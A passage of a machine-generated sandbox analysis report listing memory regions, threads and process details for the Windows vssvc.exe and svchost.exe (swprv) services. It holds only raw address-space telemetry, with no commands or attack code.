region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1515 start_va = 0x7ffda000 end_va = 0x7ffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 1516 start_va = 0x7ffdb000 end_va = 0x7ffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 1517 start_va = 0x7ffdc000 end_va = 0x7ffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1518 start_va = 0x7ffdd000 end_va = 0x7ffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1519 start_va = 0x7ffde000 end_va = 0x7ffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1520 start_va = 0x7ffdf000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Thread: id = 75 os_tid = 0x304 Thread: id = 76 os_tid = 0x240 Thread: id = 77 os_tid = 0x21c Thread: id = 78 os_tid = 0x234 Thread: id = 79 os_tid = 0x218 Thread: id = 80 os_tid = 0x230 Thread: id = 81 os_tid = 0x570 Thread: id = 82 os_tid = 0x424 Thread: id = 100 os_tid = 0xb18 Process: id = "7" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x7ef47c60" os_pid = "0x8e8" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x1d0" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005de60" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1242 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1243 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1244 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1245 start_va = 0x40000 end_va = 0x13cfff monitored = 0 entry_point = 0xd883c region_type = mapped_file name = "vssvc.exe" filename = "\\Windows\\System32\\VSSVC.exe" (normalized: "c:\\windows\\system32\\vssvc.exe") Region: id = 1246 start_va = 0x140000 end_va = 0x140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 1247 start_va = 0x150000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vssvc.exe.mui" filename = "\\Windows\\System32\\en-US\\VSSVC.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\vssvc.exe.mui") Region: id = 1248 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1249 start_va = 0x180000 end_va = 0x18cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 1250 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1251 start_va = 0x1a0000 end_va = 0x1a7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 1252 start_va = 0x1b0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1253 start_va = 0x1f0000 end_va = 0x256fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1254 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 1255 start_va = 0x2a0000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 1256 start_va = 0x3a0000 end_va = 0x467fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1257 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 1258 start_va = 0x490000 end_va = 0x590fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 1259 start_va = 0x5a0000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1260 start_va = 0x620000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 1261 start_va = 0x740000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 1262 start_va = 0x800000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 1263 start_va = 0x8c0000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 1264 start_va = 0x900000 end_va = 0x93ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 1265 start_va = 0x940000 end_va = 0x97ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 1266 start_va = 0x980000 end_va = 0xc4efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1267 start_va = 0xc80000 end_va = 0xd7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c80000" filename = "" Region: id = 1268 start_va = 0x6bd60000 end_va = 0x6bd66fff monitored = 0 entry_point = 0x6bd62b44 region_type = mapped_file name = "fltlib.dll" filename = "\\Windows\\System32\\fltLib.dll" (normalized: "c:\\windows\\system32\\fltlib.dll") Region: id = 1269 start_va = 0x6c710000 end_va = 0x6c719fff monitored = 0 entry_point = 0x6c714aac region_type = mapped_file name = "vss_ps.dll" filename = "\\Windows\\System32\\vss_ps.dll" (normalized: "c:\\windows\\system32\\vss_ps.dll") Region: id = 1270 start_va = 0x6db70000 end_va = 0x6db7ffff monitored = 0 entry_point = 0x6db71664 region_type = mapped_file name = "xolehlp.dll" filename = "\\Windows\\System32\\xolehlp.dll" (normalized: "c:\\windows\\system32\\xolehlp.dll") Region: id = 1271 start_va = 0x6dc20000 end_va = 0x6dc2ffff monitored = 0 entry_point = 0x6dc21270 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1272 start_va = 0x6dc30000 end_va = 0x6dd45fff monitored = 0 entry_point = 0x6dc31590 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 1273 start_va = 0x6fb50000 end_va = 0x6fb57fff monitored = 0 entry_point = 0x6fb53a49 region_type = mapped_file name = "virtdisk.dll" filename = "\\Windows\\System32\\virtdisk.dll" (normalized: "c:\\windows\\system32\\virtdisk.dll") Region: id = 1274 start_va = 0x73920000 end_va = 0x73933fff monitored = 0 entry_point = 0x73921464 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 1275 start_va = 0x73940000 end_va = 0x7397afff monitored = 0 entry_point = 0x73941350 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 1276 start_va = 0x73b70000 end_va = 0x73bb6fff monitored = 0 entry_point = 0x73b889f9 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1277 start_va = 0x73bf0000 end_va = 0x73c03fff monitored = 0 entry_point = 0x73bf1da9 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1278 start_va = 0x73fa0000 end_va = 0x73faefff monitored = 0 entry_point = 0x73fa125e region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1279 start_va = 0x73fb0000 end_va = 0x73fbefff monitored = 0 entry_point = 0x73fb12a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1280 start_va = 0x73fc0000 end_va = 0x73fc8fff monitored = 0 entry_point = 0x73fc15a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1281 start_va = 0x73fd0000 end_va = 0x73fe0fff monitored = 0 entry_point = 0x73fd1300 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1282 start_va = 0x748b0000 end_va = 0x748c1fff monitored = 0 entry_point = 0x748b4795 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1283 start_va = 0x74d50000 end_va = 0x74d58fff monitored = 0 entry_point = 0x74d51220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1284 start_va = 0x75070000 end_va = 0x750aafff monitored = 0 entry_point = 0x7507128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1285 start_va = 0x752d0000 end_va = 0x752e6fff monitored = 0 entry_point = 0x752d3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1286 start_va = 0x75460000 end_va = 0x7547afff monitored = 0 entry_point = 0x75461286 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1287 start_va = 0x754e0000 end_va = 0x754f0fff monitored = 0 entry_point = 0x754e4982 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 1288 start_va = 0x756b0000 end_va = 0x756c8fff monitored = 0 entry_point = 0x756b1319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1289 start_va = 0x75760000 end_va = 0x7576bfff monitored = 0 entry_point = 0x757610e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1290 start_va = 0x75800000 end_va = 0x7580dfff monitored = 0 entry_point = 0x75801235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1291 start_va = 0x75a80000 end_va = 0x75aa6fff monitored = 0 entry_point = 0x75a858b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1292 start_va = 0x75ab0000 end_va = 0x75afafff monitored = 0 entry_point = 0x75ab7e10 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1293 start_va = 0x75b00000 end_va = 0x75b11fff monitored = 0 entry_point = 0x75b01441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1294 start_va = 0x75ba0000 end_va = 0x75bedfff monitored = 0 entry_point = 0x75ba9c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1295 start_va = 0x75c50000 end_va = 0x75decfff monitored = 0 entry_point = 0x75c517e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1296 start_va = 0x75df0000 end_va = 0x75e90fff monitored = 0 entry_point = 0x75e22433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1297 start_va = 0x75ea0000 end_va = 0x75ebefff monitored = 0 entry_point = 0x75ea1355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1298 start_va = 0x75ec0000 end_va = 0x75f8bfff monitored = 0 entry_point = 0x75ec168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1299 start_va = 0x75fa0000 end_va = 0x75ff6fff monitored = 0 entry_point = 0x75fb9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1300 start_va = 0x76040000 end_va = 0x76113fff monitored = 0 entry_point = 0x7608ce6f region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1301 start_va = 0x76130000 end_va = 0x761cffff monitored = 0 entry_point = 0x761449e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1302 start_va = 0x761d0000 end_va = 0x7626cfff monitored = 0 entry_point = 0x76203fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1303 start_va = 0x76270000 end_va = 0x7631bfff monitored = 0 entry_point = 0x7627a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1304 start_va = 0x76460000 end_va = 0x76478fff monitored = 0 entry_point = 0x76464975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1305 start_va = 0x76480000 end_va = 0x765dbfff monitored = 0 entry_point = 0x764cba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1306 start_va = 0x766e0000 end_va = 0x767a8fff monitored = 0 entry_point = 0x766fd711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1307 start_va = 0x767b0000 end_va = 0x767b9fff monitored = 0 entry_point = 0x767b136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1308 start_va = 0x769c0000 end_va = 0x76a4efff monitored = 0 entry_point = 0x769c3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1309 start_va = 0x776d0000 end_va = 0x7780bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1310 start_va = 0x77810000 end_va = 0x77892fff monitored = 0 entry_point = 0x778123d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1311 start_va = 0x77910000 end_va = 0x77910fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1312 start_va = 0x7f6f0000 end_va = 0x7f7effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1313 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1314 start_va = 0x7ffd3000 end_va = 0x7ffd3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 1315 start_va = 0x7ffd9000 end_va = 0x7ffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1316 start_va = 0x7ffda000 end_va = 0x7ffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 1317 start_va = 0x7ffdb000 end_va = 0x7ffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 1318 start_va = 0x7ffdc000 end_va = 0x7ffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1319 start_va = 0x7ffdd000 end_va = 0x7ffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1320 start_va = 0x7ffde000 end_va = 0x7ffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1321 start_va = 0x7ffdf000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1322 start_va = 0x74a20000 end_va = 0x74b14fff monitored = 0 entry_point = 0x74a30d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1323 start_va = 0x63450000 end_va = 0x634cafff monitored = 0 entry_point = 0x63453d3e region_type = mapped_file name = "catsrvut.dll" filename = "\\Windows\\System32\\catsrvut.dll" (normalized: "c:\\windows\\system32\\catsrvut.dll") Region: id = 1324 start_va = 0x6a860000 end_va = 0x6a869fff monitored = 1 entry_point = 0x6a861190 region_type = mapped_file name = "mfcsubs.dll" filename = "\\Windows\\System32\\mfcsubs.dll" (normalized: "c:\\windows\\system32\\mfcsubs.dll") Region: id = 1325 start_va = 0xde0000 end_va = 0xedffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 1326 start_va = 0x7ffd9000 end_va = 0x7ffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Thread: id = 86 os_tid = 0x910 Thread: id = 87 os_tid = 0x914 Thread: id = 88 os_tid = 0x8f8 Thread: id = 89 os_tid = 0x8f4 [0109.908] malloc (_Size=0x80) returned 0x48e7b0 Thread: id = 90 os_tid = 0x1b8 Thread: id = 91 os_tid = 0x8f0 Thread: id = 92 os_tid = 0x8ec Thread: id = 93 os_tid = 0xa9c Thread: id = 114 os_tid = 0xd9c Process: id = "8" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7ef473e0" os_pid = "0xa70" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "7" os_parent_pid = "0x1d0" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005e2aa" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1327 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1328 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1329 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1330 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1331 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1332 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1333 start_va = 0xd0000 end_va = 0x10ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1334 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1335 start_va = 0x120000 end_va = 0x120fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 1336 start_va = 0x140000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1337 start_va = 0x1a0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1338 start_va = 0x1e0000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1339 start_va = 0x260000 end_va = 0x29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 1340 start_va = 0x310000 end_va = 0x31ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 1341 start_va = 0x370000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1342 start_va = 0x470000 end_va = 0x73efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1343 start_va = 0x740000 end_va = 0x807fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 1344 start_va = 0x810000 end_va = 0x910fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 1345 start_va = 0xa10000 end_va = 0xa4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 1346 start_va = 0xa70000 end_va = 0xaaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 1347 start_va = 0xfe0000 end_va = 0xfe7fff monitored = 0 entry_point = 0xfe2104 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1348 start_va = 0x69ce0000 end_va = 0x69d2efff monitored = 0 entry_point = 0x69ce14f6 region_type = mapped_file name = "swprv.dll" filename = "\\Windows\\System32\\swprv.dll" (normalized: "c:\\windows\\system32\\swprv.dll") Region: id = 1349 start_va = 0x6bd60000 end_va = 0x6bd66fff monitored = 0 entry_point = 0x6bd62b44 region_type = mapped_file name = "fltlib.dll" filename = "\\Windows\\System32\\fltLib.dll" (normalized: "c:\\windows\\system32\\fltlib.dll") Region: id = 1350 start_va = 0x6c710000 end_va = 0x6c719fff monitored = 0 entry_point = 0x6c714aac region_type = mapped_file name = "vss_ps.dll" filename = "\\Windows\\System32\\vss_ps.dll" (normalized: "c:\\windows\\system32\\vss_ps.dll") Region: id = 1351 start_va = 0x6dc20000 end_va = 0x6dc2ffff monitored = 0 entry_point = 0x6dc21270 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1352 start_va = 0x6fb50000 end_va = 0x6fb57fff monitored = 0 entry_point = 0x6fb53a49 region_type = mapped_file name = "virtdisk.dll" filename = "\\Windows\\System32\\virtdisk.dll" (normalized: "c:\\windows\\system32\\virtdisk.dll") Region: id = 1353 start_va = 0x73bf0000 end_va = 0x73c03fff monitored = 0 entry_point = 0x73bf1da9 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1354 start_va = 0x75070000 end_va = 0x750aafff monitored = 0 entry_point = 0x7507128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1355 start_va = 0x752d0000 end_va = 0x752e6fff monitored = 0 entry_point = 0x752d3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1356 start_va = 0x75760000 end_va = 0x7576bfff monitored = 0 entry_point = 0x757610e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1357 start_va = 0x75800000 end_va = 0x7580dfff monitored = 0 entry_point = 0x75801235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1358 start_va = 0x75ab0000 end_va = 0x75afafff monitored = 0 entry_point = 0x75ab7e10 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1359 start_va = 0x75ba0000 end_va = 0x75bedfff monitored = 0 entry_point = 0x75ba9c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1360 start_va = 0x75df0000 end_va = 0x75e90fff monitored = 0 entry_point = 0x75e22433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1361 start_va = 0x75ea0000 end_va = 0x75ebefff monitored = 0 entry_point = 0x75ea1355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1362 start_va = 0x75ec0000 end_va = 0x75f8bfff monitored = 0 entry_point = 0x75ec168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1363 start_va = 0x76040000 end_va = 0x76113fff monitored = 0 entry_point = 0x7608ce6f region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1364 start_va = 0x76130000 end_va = 0x761cffff monitored = 0 entry_point = 0x761449e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1365 start_va = 0x761d0000 end_va = 0x7626cfff monitored = 0 entry_point = 0x76203fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1366 start_va = 0x76270000 end_va = 0x7631bfff monitored = 0 entry_point = 0x7627a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1367 start_va = 0x76460000 end_va = 0x76478fff monitored = 0 entry_point = 0x76464975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1368 start_va = 0x76480000 end_va = 0x765dbfff monitored = 0 